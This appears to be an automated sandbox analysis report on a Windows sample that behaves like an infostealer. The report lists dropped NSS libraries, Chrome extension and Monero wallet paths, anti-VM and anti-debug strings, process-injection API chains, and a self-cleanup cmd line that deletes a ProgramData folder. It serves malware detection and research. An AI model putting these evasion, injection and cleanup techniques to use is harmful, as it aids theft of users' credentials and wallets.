Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157843167.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: file.exe, 00000000.00000002.3149404495.0000000043C92000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: file.exe, 00000000.00000002.3143576967.0000000037DBA000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157843167.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.0.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0062A132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0062A132

Source: vcruntime140.dll.0.dr

Static PE information: real checksum: 0x16dd4 should be: 0x13f4f

Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006409C2 push ecx; ret	0_2_006409D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006345B9 push esi; ret	0_2_006345BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062F635 push ecx; ret	0_2_0062F648

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_0062A132

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.0.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2026579661.0000000000641000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6520, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe	Binary or memory string: DIR_WATCH.DLL
Source: file.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe	Binary or memory string: API_LOG.DLL
Source: file.exe	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL10:31:5110:31:5110:31:5110:31:5110:31:5110:31:51DELAYS.TMP%S%SNTDLL.DLL

Source: C:\Users\user\Desktop\file.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

0_2_006117FD

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 6.8 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 3948

Thread sleep count: 87 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00622A37 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00622B4Ah

0_2_00622A37

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00627178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_00627178
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061A941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcatA,lstrcatA,lstrcatA,CopyFileA,_memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0061A941
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00626A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	0_2_00626A05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00611D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00611D70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00627D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00627D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061C528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0061C528
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061E5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0061E5B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00628D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperationA,FindNextFileA,FindClose,	0_2_00628D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061CE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0061CE96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062785A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_0062785A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061C888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0061C888
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061DD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0061DD2A

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00626E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_00626E7F

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00622C16 GetSystemInfo,wsprintfA,

0_2_00622C16

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Web Data.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Web Data.10.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Web Data.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Web Data.10.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Web Data.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: file.exe, 00000000.00000002.3130563158.000000000340F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Web Data.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Web Data.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Web Data.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000002.3130563158.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Web Data.10.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Web Data.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Web Data.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Web Data.10.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Web Data.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Web Data.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Web Data.10.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Web Data.10.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Web Data.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Web Data.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Web Data.10.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Web Data.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.3130563158.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Web Data.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Web Data.10.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Web Data.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Web Data.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-74730
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-74746
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-75856

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0062E88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0062E88C

Source: C:\Users\user\Desktop\file.exe

0_2_0062A132

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061149D mov eax, dword ptr fs:[00000030h]	0_2_0061149D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061147A mov eax, dword ptr fs:[00000030h]	0_2_0061147A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00611492 mov eax, dword ptr fs:[00000030h]	0_2_00611492
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00629D78 mov eax, dword ptr fs:[00000030h]	0_2_00629D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00629D79 mov eax, dword ptr fs:[00000030h]	0_2_00629D79

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00622805 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,

0_2_00622805

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062E88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0062E88C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062F20C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0062F20C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00638EAE SetUnhandledExceptionFilter,	0_2_00638EAE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C4AAC62

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6520, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006212EC _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_006212EC

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006242EE __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	0_2_006242EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00624452 CreateToolhelp32Snapshot,Process32First,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,	0_2_00624452
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006243C5 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	0_2_006243C5

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAAFBFBAAKEC" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C4F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C4F4760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C3D1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6C3D1C30

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0061112B cpuid

0_2_0061112B

Source: C:\Users\user\Desktop\file.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	0_2_00622A37
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0063C94C
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_0063CA41
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_0063CAE8
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_0063B2D0
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_0063CB43
Source: C:\Users\user\Desktop\file.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_0063C3C0
Source: C:\Users\user\Desktop\file.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_00636C63
Source: C:\Users\user\Desktop\file.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_0063CD14
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_00638D1C
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	0_2_0063FDEF
Source: C:\Users\user\Desktop\file.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_0063B5EE
Source: C:\Users\user\Desktop\file.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00638DF6
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesA,	0_2_0063CDD6
Source: C:\Users\user\Desktop\file.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0063CE67
